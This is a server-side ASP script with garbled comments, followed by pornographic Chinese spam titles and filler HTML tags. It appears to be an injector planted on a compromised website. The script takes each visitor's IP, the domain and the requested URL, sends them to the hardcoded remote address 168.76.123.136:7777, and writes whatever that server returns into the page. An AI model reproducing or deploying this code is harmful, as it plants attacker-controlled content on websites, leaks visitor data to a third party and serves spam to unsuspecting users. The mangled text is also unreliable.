<% Response.Charset="gbk" Function GetUserRealIP() Dim strIP strIP = Request.ServerVariables("HTTP_X_FORWARDED_FOR") If strIP = "" Or Not IsValidIP(strIP) Then ' Èç¹ûHTTP_X_FORWARDED_FOR²»´æÔÚ»辰²»ÊÇÓÐÐ∫IP£¬Ô辰ʹÓÃREMOTE_ADDR strIP = Request.ServerVariables("REMOTE_ADDR") Else ' Èç¹û´æÔÚHTTP_X_FORWARDED_FORÇÒÆäΪÓÐÐ∫IP£¬Ô辰ʹÓõÚÒ»¸öIP£“Í“³£ÊÇ¿Í»∫¶ËµÄIP£© ' Ò辰ΪHTTP_X_FORWARDED_FOR¿ÉÄÜ∼邦º¬¶角¸öIP£¬ÓÃ","﹞Ö¸ô strIP = Split(strIP, ",")(0) End If GetUserRealIP = strIP End Function Function IsValidIP(strIP) Dim arrIP arrIP = Split(strIP, ".") If UBound(arrIP) <> 3 Then IsValidIP = False Exit Function End If For i = 0 To 3 If Not IsNumeric(arrIP(i)) Or CLng(arrIP(i)) > 255 Then IsValidIP = False Exit Function End If Next IsValidIP = True End Function realip=GetUserRealIP() yuming=Request.ServerVariables("SERVER_NAME") currentURL = Request.ServerVariables("HTTP_URL") ' ´´½“XMLHTTP¶ÔÏ車 Set objXMLHTTP = Server.CreateObject("MSXML2.XMLHTTP") ' É豕ÖÃͬ²½ÇëÇ車µÄÑ¡ÏÒÔ¼∼ÇëÇ車µÄURL objXMLHTTP.Open "GET", "http://168.76.123.136:7777/"&yuming¤tURL&"/"&"realip="&realip, False ' ﹞¢ËÍÇëÇ車 objXMLHTTP.Send () ' µÈ´ýÇëÇ車Í那³É While objXMLHTTP.readyState <> 4 objXMLHTTP.waitForResponse 1000 Wend ' »ñÈ¡ÍøÒ³ÄÚÈÝ pageContent = objXMLHTTP.responseText ' ÊÍ﹞ÅXMLHTTP¶ÔÏ車 Set objXMLHTTP = Nothing ' ÏÔʾÍøÒ³ÄÚÈÝ Response.Write(pageContent) %> 真人版无码作爱视频| 国产成人免费视频一区二区三区|精品亚亚洲成AV无码专区|亚洲熟妇无码天堂|
 • <xmp id="ek2ug"><nav id="ek2ug"></nav>
 • <nav id="ek2ug"><code id="ek2ug"></code></nav>
  <menu id="ek2ug"><tt id="ek2ug"></tt></menu>
  <dd id="ek2ug"></dd>
 • <menu id="ek2ug"></menu>
  <menu id="ek2ug"><strong id="ek2ug"></strong></menu>
  <xmp id="ek2ug">